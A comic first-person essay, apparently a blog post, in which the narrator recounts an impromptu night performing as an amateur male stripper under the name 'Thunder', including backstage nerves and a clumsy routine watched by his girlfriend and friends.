I told him I was “ Saicked ” ( “ psyched , ” in southern ) , but that I was going to go out to make a couple of calls , and I ’d be right back .
I trotted back out to the car to share the good news .
Utter disbelief shrouded us all , as we realized that this shit was going down .
Tonight .
No audition , in fact .
We all mentally peed our pants , and formulated our strategy for them to witness this spectacle - to - be .
The plan was for me to shoot a text message to them , who would be next door at the main club , when things were getting hot .
Back inside I went .
I found myself a place at the near - vacant bar and ordered a Bud .
I really wanted a double Beam on the rocks with a Jack chaser at that point , but being the consummate professional that I am , realized that A ) I already had a pretty solid buzz on , and B )
It would not be good for my tips to perform the face - down snow angel maneuver .
I sat through one beer , then ordered another when another guy finally showed up .
He bro’d down with Jeff , got the skinny on the night ’s line up , and then we were introduced .
I do n’t remember his name , but the dude was a real pro , despite his mumbling southern accent .
He took me to the backstage area where , yet again , I was floored .
In taking it all in , the first thing I saw was a weight bench and a multi- purpose workout station .
Then the doors .
The French doors of which I earlier spoke took on an entirely different presence from this side of them .
They loomed , taunting me .
They told me I was a wimp .
They told me I would n’t do this .
Then finally they talked trash on my momma .
Nobody talks trash on Thunder ’s momma .
Upon further inspection of this cavernous staging room , I noticed there were no outfits .
No tear - away pants , no props , not really much of anything .
I noticed what appeared to be about a size 18 pair of Timberlands lying neglected by one of the many chairs upon which I was scared to sit .
I noticed an enormous set of gold lame` boxers .
I noticed an American flag bandanna lying on the dressing counter .
In a feast of ingenuity , and in an effort to really spice up my routine , I thought , “ Damn !
It will be sexy as HELL when I tantalizingly pull that slowly out of my pants !!! ”
I then figured , “ Shit !
I can do the same thing with those boxers !!! ”
And oh snap – an abandoned fedora .
It was then that I stood firmly in my commitment to stripper excellence and decided to go ahead and grab a seat in one of the previously condemned chairs .
After all , my knees were knocking together like coconuts .
As the first guy took the stage , to a now packed front row of screaming bachelorettes , I went to peep his act .
I mean , I really needed to see what I was getting into .
I really felt like I needed some more moves .
This guy was playing the Naughty Cop bit .
He started lining up chairs ( money ) on the stage , and filling them with girls from the bachelorette squad .
He then proceeded to perform unspeakable acts of brutish simulated sex on them , one by one , on down the line , harvesting dollar bills like he was Trick - or - Treating .
I stood , amazed at his prowess , and simultaneously , a wave of self - disgust and nausea crashed over me .
That was disgusting .
I would NOT be doing any of that nonsense .
It was then that I decided I am a “ No - Touch ” act .
By the way , I had summoned my support team , and they were all perched faithfully to the side of the stage , in an equal amount of shock and nervous anticipation .
I snuck back out the side door for a quick interlude with them , and to look my girlfriend in the eyes .
She : solid as a rock , confident in my ability to entertain , and most importantly , confident that I am not a totally disgusting professional like “ Naughty Cop . ”
Me : coconut knees , stingray guts , and sweaty as a cold beer in hell .
Thankfully , Allison had a little dixie cup of whiskey waiting for me .
She ’s a total life saver .
Down the hatch it went .
Maybe the upside - down snow angel would be part of my act after all .
I did n’t know how it could go down any other way .
A quick knowing glance , then back to my spot back stage .
I did n’t want to loiter too long , for fear of it blowing my cover .
I was staying in solid touch with the crew , and the love of my life , via texts .
Mostly from my end went things like “ I am gross .
I am one sexy IDIOT . ” From Allison , things like , “ How much longer !?!?
I love you no matter what !!! ”
And from Wes , Kristen ’s man , and a great friend ( obviously ) “ Dude , you do n’t have to do this .
We can bail at any time ! ”
They went back and forth , and it may have been the only real thing keeping me from making poopy times in my g- string .
Next up after the cop , was a guy named Syd , but to me he will forever be known as Black Zorro .
He had on some musketeer boots and was trying to hide his empirical evidence of manhood in what I can only describe as a tasseled satin tube sock .
You know what ; I do n’t want to talk about Black Zorro anymore .
This was really dragging on , and I was long past being nervous .
I was in a self - defensive phase of shock .
Black Zorro was done , and some other michelin man with a back like a tortoise shell started doing his thing .
I did n’t really know what to do , but seeing as how my ego had shrunken to about a fifth of its normal size , I felt I should make use of the weight bench .
Time to pump up .
“ It ’s almost my time to shine , ” I thought .
“ I can feel it . ” I swaggered up to the bench and surveyed the set up .
Flat bench , about 150 pounds , including the bar .
I did a couple of Michael Phelps shoulder shake - outs , and got ready to pump some iron .
I laid down , lifted the bar , and thought , “ Shit . ” Remember , this was NOT my night to wuss out .
So I let down the weights , which at this point I can only equate to changing the oil in a Volkswagen , only to have the jack stand fail .
The bar was pressed oh so gingerly against my massive pecs , and I did what I could to get it back up on to the perch .
Alright .
Pumped .
Weights , lifted .
Show time was drawing near like a thunder storm .
That ’s because for that night , and that night only , I was Thunder .
Feeling still as if I was just not quite enough , I asked Black Zorro if I could borrow his search light .
He had a huge , larger - than - a - jambox sized search light , that he had not utilized in his own pony show .
Okay , he had a lot of huge things , but I was really focused on this light , and he was glad to loan it out to me .
I felt a real part of the brotherhood of dudes that take off their clothes for money at this point , and knew that I would do just fine .
I heard the muffled voice of the night ’s Emcee come rumbling through the French doors .
It had that greasy , sleazy , movie - preview - guy sound to it , and it scared me .
What scared me even more was that as he announced my upcoming act , he ’d mentioned to the raving crowd that “ Now , ladies , get ready for some HOT amateur action … . ”
My cover was blown for sure .
Not surprised , I stood up and checked my kit just in time to hear , “ blah , blah , blah … …
THUNDERRRRRRRRRRRRRR ! ”
Armed with my search light , and a hidden couple of items in my “ sexy fit ” jeans , I busted open the French doors .
Wielding the light like some sort of bazooka , I shone it around in an effort to tantalize .
What actually happened was I think I all but blinded the bachelorette party members , at which point they promptly got up and left .
That did not necessarily make me feel successful , though it did relieve some stress , as it knocked about 8 potential hecklers out of the mix .
Remaining stage - side were Allison ( I thought I saw hearts in her eyes , but it was probably vomit ) , Kristen ( I know it was vomit in her eyes ) , Wes ( again , vomit ) , and off to one side of the stage , a group of middle - aged crooning African - American ladies .
Strewn throughout the rest of the joint were various groups of ladies who I could not begin to describe , due to my being blind from stage lights , and nausea .
But I had to throw my feelings aside .
It was time to make some money .
Off came the Swayze shirt , Hulk Hogan style .
A couple of pelvic rotations some turn - around booty shaking , and I could see from the crown reaction that I was really killing it .
Literally .
Out came the bandanna , slowly , sexily , like a short snake in the jungle .
And a toss .
And the Guns ‘ n ’ Roses was thumping .
Out came the boxer - short - parachute in all its sparkling , shimmering glory .
And a toss .
“ Welcome to the Jungle … ” Off came the tank .
“ We got fun and games … ” I was totally dancing .
With my pasty torso glowing like silly putty in the blue and red lights , I gave it my all .
Thunder Style .
I had not yet formulated a way to smoothly get out of those “ sexy fit ” jeans to show off my Target - bought boxer - briefs , but hey – real talent knows how to improvise .
I took ’em off .
“ We got everything you want , honey we know the names … ” Down I laid , clumsily peeling the jeans off like someone trying to peel a huge banana .
I had envisioned it going more smoothly , more like taking off a pillow case .
“ We are the people that can find whatever you may need … . ”
I recovered , with a slicing sexy grin on my face and knew that I needed a money maker .
It was time to bust out the worm .
What I actually busted out were my wrists .
As I type this , evidence of my amateur worm maneuver exist .
Pushed that move into the modified floor hump for what I think may have been a scream coming from the back of the club .
Yes , indeed .
It was a scream of terror .
“ If you got the money , honey we got your diseeeeease … . ”
Floor hump led to some portly woman coming up to the stage to give me what I can only call at this point , a donation .
I then resorted to the lowest of moves – a belly crawl mission over to the women of color to flat out ask them for money .
I ’m serious .
I needed to at least recoup the cost of one alcoholic beverage .
“ In the Jungle , welcome to the jungle .
Watch it bring you to your knees …. ”
And that it did .
A couple smacks of my leather belt on the stage , and a quick tour of my audience revealed that I am not really a hot commodity in that market .
“ I wanna watch you bleeeed … … ” Cash that is .
Not tears .
Lying on my back , I communicated to the Emcee that it was time to wrap it up .
He faded it out as I humbly gathered up my belongings and sauntered backstage to get dressed , and get the fuck out of there .
Game over .
I quickly did so , gathering up the troops on the way out , thinking , “ Allison is the best person ever .
How does she deal ? ” I guess it ’s because I ’m not really a male entertainer .
At least not anymore .
by
